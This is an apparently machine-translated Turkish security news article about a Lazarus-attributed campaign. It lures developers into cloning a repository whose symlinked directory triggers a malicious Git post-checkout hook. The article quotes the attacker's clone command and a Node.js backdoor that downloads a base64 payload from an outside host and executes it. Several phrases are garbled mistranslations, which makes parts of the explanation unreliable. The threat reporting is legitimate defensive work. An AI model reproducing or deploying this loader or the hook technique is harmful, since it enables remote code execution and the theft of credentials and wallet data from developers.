Bu ayın başlarında, siber güvenlik araştırmacıları, akıllıca hazırlanmış bir GIT Symlink güvenlik açığı ile geliştiricileri ve kripto profesyonellerini hedefleyen Lazarus grubuna atfedilen yeni bir kimlik avı kampanyası ortaya çıkardı.
Saldırganlar, yalnızca geleneksel kötü amaçlı yazılım dağıtım kanallarına güvenmek yerine, GIT’in depo yollarını işleme şeklini silahlandırdılar ve rutin işlemler sırasında kod yürütülmesini tetiklemek için kötü niyetli kancaları sembolik bağlantılara yerleştirdiler.
Bu teknik, saldırganların, geliştirme iş akışlarının sosyal mühendisliğe karşı bağışık olduğunu varsayan yüksek değerli hedeflerden ödün verirken düşük bir profil korumasını sağlar.
İlk cazibe, potansiyel kurbanların sahte bir teknik görüşmeye katılmaya davet edildiği profesyonel ağ platformlarında kişiselleştirilmiş mesajlarla başlar.
Konuşma, kurbanın güvenini kazanmak ve onları tek bir git klon komutu yürütmeye yönlendirecek şekilde yapılandırılmıştır.
Bunun yanı sıra, depo adında iç içe bir dizin içerir api/db_drivers Bu aslında depoya geri dönen sembolik bir bağlantı .git Modül dizini.
Bu aldatıcı yapı, git bir ödeme işlemi gerçekleştirdikten sonra, farkında olmadan saldırganın özel kanca komut dosyasını yürütmesini sağlar.
Kucoin analistleri, tehlikeye atılan özel GitLab depolarının raporlarının ardından Ağustos ayı sonlarında bu saldırı vektörünün ilk örneklerini kaydetti.
Ayrıntılı analiz, SymLink Sustamit’in GIT’in gizli bir arka kapıyı başlatmak için kontrol sonrası kanca mekanizmasını kullandığını ortaya koydu.
Kötü niyetli bir post-checkout Script Sembolik bağlantı içinde, saldırganlar ana kod tabanını değiştirmeden kod yürütme sağlar, böylece standart bütünlük kontrollerinden ve statik tarayıcılardan kaçar.
Müteakip Adli Sınav, yükün, bir uzak komut ve kontrol sunucusuna şifreli bir bağlantı kurduğunu, kimlik bilgilerini sifonlama, sistem bilgilerini ve cüzdan verilerini tehdit aktörlerine geri döndürdüğünü doğruladı.
%20(Source%20-%20Kucoin).webp)
İstismarın karmaşıklığı, meşru iş akışlarıyla kesintisiz entegrasyonunda yatmaktadır. Mağdurlar bunu yürüttükten sonra bildirir:-
git clone --recursive https://guest:[email protected]/product/delivery.git
cd product/deliveryKötü amaçlı kanca otomatik olarak tetiklenir. Gömülü senaryo, hooks/post-checkoutbir node.js arka kapı çağırır:-
const vm = require('vm');
const https = require('https');
https.get('https://gitlab.tresalabs.com:8443/api/v4/project', res => {
let data="";
res.on('data', chunk => data += chunk);
res.on('end', () => vm.runInNewContext(Buffer.from(JSON.parse(data).payload, 'base64')));
});Dağıtım yapıldıktan sonra, bu arka kapı, belirgin kurcalama belirtilerini kaldırmak için proje dosyalarını temizleyip değiştirerek kalıcılığı korur ve geliştiricilerin sadece beklenen kodu görmelerini sağlar.
Enfeksiyon mekanizması derin dalış
Enfeksiyon iki koordineli aşamada ortaya çıkıyor: GIT’in yol çözünürlüğünün ve gizli kanca yürütülmesinin sömürülmesi.
İlk olarak, saldırganlar adlı bir dizin girişi ile bir depo oluşturuyor api/db_drivers^Myolu yazmak için taşıma iadesi taşımacılığını kullanmak api/db_drivers SymLink hedefini dahili olarak tutarken diskte.
%20(Source%20-%20Kucoin).webp)
Bu tutarsızlık, Git’i geçiş sırasında normal bir dizin olarak ele almaya, ancak kancaları başlatırken bir bağlantı olarak karıştırır.
Git varsayılan ödeme yaparken, gizli SymLink’i takip eder. .git/modules/api/db_drivers/hooks/ dizin ve yürütür post-checkout senaryo.
GIT’in temel bir davranışından yararlanarak, Lazarus Grubu yeni bir teknik yaratıcılık seviyesi gösterdi ve tedarik zinciri uzlaşmasını yüksek değerli bireyleri hedeflemek için sosyal mühendislik ile harmanladı.
Kampanya, iş akışı bütünlüğü hakkındaki varsayımların tartışmasız kaldığında en güvenilir geliştirme araçlarının bile silahlandırılabileceğini hatırlatıyor.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.